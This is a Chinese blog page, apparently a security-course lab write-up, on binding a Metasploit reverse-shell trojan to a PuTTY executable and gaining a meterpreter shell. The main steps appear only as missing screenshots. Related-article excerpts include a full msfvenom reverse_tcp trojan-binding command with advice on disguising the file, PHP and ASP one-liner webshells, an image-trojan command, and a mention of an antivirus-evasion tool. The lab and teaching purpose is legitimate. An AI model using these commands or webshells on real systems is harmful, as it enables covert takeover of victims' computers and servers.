Metasploit 渗透测试三 | 制作木马并获取节点shell

最新推荐文章于 2023-02-18 01:51:29 发布
最新推荐文章于 2023-02-18 01:51:29 发布
阅读量389 收藏
点赞数
分类专栏: 网络安全综合实践
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43894553/article/details/109379086
版权
本文介绍了如何使用msfvenom创建绑定攻击代码的木马程序,将其附加到putty_mydown0501.exe上,并通过目标机下载执行,以获得meterpreter shell。过程中涉及木马上传、监听设置和目标机的shell权限获取步骤。
摘要由CSDN通过智能技术生成

Metasploit 渗透测试三 | 制作木马并获取节点shell

问题概述

下载putty程序(也可以使用其它程序),利用msfvenom制作绑定攻击代码的木马程序,并在目标节点运行该程序,获得目标节点的shell。

执行过程

首先msfvenom制作木马,附加在putty_mydown0501.exe上的chenyang.exe:(注意不同位置参数的意义)

在这里插入图片描述
将木马上传到服务器,便于在目标机直接下载:
在这里插入图片描述
设置参数,开始监听:
在这里插入图片描述
目标机运行木马打通meterpreter,执行shell获取权限:

在这里插入图片描述

LALAAYANG
关注
专栏目录
34. Metasploit通过samba服务获取shell
__Qian的博客
03-13 802
1.使用nmap扫描端口 2.收集到目标机相关信息后,为其选择正确的Exploit和合适的Payload,从扫描结果发现主机运行着Samba 3.x服务 输入search samba 命令搜索Smaba的漏洞利用模块 3.选择漏洞利用模块 因为exploit/multi/samba/usermap_script 模块被标记为“Excellent”,即为最杰出而且时间是最新的,选择次模块进行渗透...
渗透测试学习 十四、 脚本木马制作与原理
weixin_30469895的博客
05-10 303
大纲:webshell制作与原理    webshell使用技巧    webshell“黑吃黑” webshell制作原理   webshell种类     一句话木马(使用的最多)、小马、大马、打包马、脱裤马、、、   一句话木马     介绍:短小精悍,并且功能强大、隐蔽性非常好,在入侵种始终扮演着非常重要的角色     e.g:<%execute request("v...
利用木马技术实现的远程数据获取
07-24
目录: 流行木马技术分析 植入方式 加载方式 数据获取 数据传输 高级技术分析 反向连接及傀儡机群组管理 绕过防火墙 自我保护 木马防御技术 传统防御技术 积极防御技术 案例分析
Linux计划任务执行msf木马,Metasploit生成木马文件获取shell和UAC提权操作
weixin_42297349的博客
05-16 954
前言攻击环境获取shellUAC提权一. 前言前段时间有做过一次内核提权的尝试,不过没有成功,主要还是权限控制的比较严格,并且该打的补丁都打了。但是方法还是有用的,还有就是思路流程总结一下。二. 攻击环境攻击机:kali Linux 2019.1 IP:192.168.28.156靶机:Windows7 ultimate sp1 IP:192.168.28.138. 获取shell3.1 生成木...
利用msfvenom制作绑定攻击代码的木马程序
m0_43406494的博客
11-13 1071
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.94.135 LPORT=7777 -x putty.exe -k -f exe -o payload.exe o参数指定输出文件名,这里使用payload.exe,一般会改成一些人畜无害的文件名 -x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。绑定程序自定义,只要能引诱到目标运行它,这里随便选用putty.exe 选用payload use expl
渗透测试实战 - 外网渗透内网穿透(超详细)
最新发布
HAKUNAMATATATTA的博客
02-18 8185
渗透测试实验,外网渗透和内网穿透的详细操作过程以及内网代理和内网探测的方法
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 8033
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
Metasploit 在Web应用渗透中的应用
通过Metasploit渗透测试人员和安全研究人员可以模拟真实的攻击场景,检验系统的安全性,并协助修复存在的漏洞。 #### 1.2 Metasploit在Web应用渗透中的重要性 Web应用渗透测试是评估和验证Web应用程序的安全性的...
04 渗透测试基础
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
web安全攻防渗透测试笔记
m0_62309510的博客
04-06 1016
sqlmap (1) 安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2) 在环境变量path中,增加python3.x 安装路径 (3) 下载sqlmap并解压缩: 地址:sqlmap: automatic SQL injection and database takeover tool Python sqlmap.py -uhttp://xxx.xxx.xxx/ Pyt...
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3377
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF ,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
利用msf生成后门拿shell
qq_36406396的博客
11-15 1万+
kali  x64:192.168.26.136 win7  x86: 192.168.26.128 先在kali终端输入msfvenom -l,打开payload目录 然后找到payload windows/meterpreter/reverse_tcp 输入以下命令生成后门qq.exe 然后将生成的qq.exe移到win7中,然后打开msf
Metasploit Framework(MSF)的使用
谢公子的博客
03-01 2万+
目录 Metasploit Metasploit的安装和升级 MSF中加载自定义的exploit模块 漏洞利用(exploit) 攻击载荷(payload) Meterpreter MS17_010(永恒之蓝) Auxiliary辅助探测模块 Exploit漏洞利用模块 Payload攻击载荷模块 后渗透阶段 Post后渗透模块 查看主机是否运行在虚拟机上 关闭杀毒...
图片木马-渗透测试
h0ers的博客
10-28 2798
制作图片木马中的问题 问题 :copy命令制作图片木马后,菜刀无法连接 1.执行步骤: 一张普通图片:1.jpg php版本一句话木马,保存为 1.php,代码如下: <?php @eval($_POST['pass']);?> 制作图片木马,将图片文件和php文件合并为2.jpg,命令如下: copy 1.jpg/b+1.php/a 2.jpg 其中 /b代表二进制文件,/a代表ASCII码文件 上传成功后,用菜刀连接,弹出成功获取图片,未拿到webshell。 2.问题排查 用HxD h
利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑
WuHao的博客
10-26 5765
前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马。 首先安装Venom Venon克隆地址:https://github.com/r00t-3xp10it/venom tar.gz OR zip OR git clone 2.赋予文件可执行权限: cd venom-main sudo chmod -R +x *.sh 3.安装依赖关系包: cd aux sudo ./setup.sh 4.运行 sudo.
手动编写木马
热门推荐
The code way of kinnisoy
04-29 3万+
使用C++实现一个简单的木马,实现木马的远程控制功能,能够开机自启动和伪装或隐藏,最后通过清除本木马,掌握常规的木马排查和查杀方法。 工具:vc++6.0 攻击机:win10(ip随机) 靶机:192.168.1.129 一、木马是什么? 这是一个老生常谈的问题,木马(Trojan)这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的本意是特洛伊的,即代指特洛伊木马,也就是木马...
weevely生成木马并反向shell连接msf
小刚的博客
05-13 3928
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于它用途 weevely实验环境weevely介绍使用流程1,使用weevely生成php木马文件2,将木马文件上传到被攻击web服务器3,使用weevely连接木马文件4,控制参数5,反向shell连接msf总结 今天使用一下kali系统下的中国菜刀weevely,生成木马文件、混淆木马文件控制Web服务器,并进一步反弹shellmetasploit做进一步控制。 实验环境 VM搭建的虚拟测试环境 1.p.
模拟渗透测试——使用metasploit与wget获取靶机shell
mirocky的博客
01-19 1569
前言 近日在复现漏洞时,由于目标所提供的服务中的某段代码没有对权限进行检查,导致了远程命令执行——RCE漏洞。 由于该漏洞本身的特性,所能执行的命令是需要通过url进行拼接且每次只可执行一句,因此尝试获取靶机shell来做到更多的事。 但在尝试的过程中发现目标对于防渗透措施做的相当不错,删除或者禁用了很多命令,上篇文章(《反弹shell常用命令》)所提到的所有方式都没有尝试成功。但天无绝人之路,busybox中wget的身影吸引了我的注意。 环境准备 靶机:ubuntu 192.168.116.128 攻击
Metasploit渗透测试实战指南
Metasploit渗透测试指南》是一本深入讲解该平台的专业书籍,由David Kennedy、Jim O’Gorman、Devon Kearns、Mati Aharoni撰写,并得到了Metasploit项目创始人HDMoore的高度评价。本书旨在帮助读者从零开始学习...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值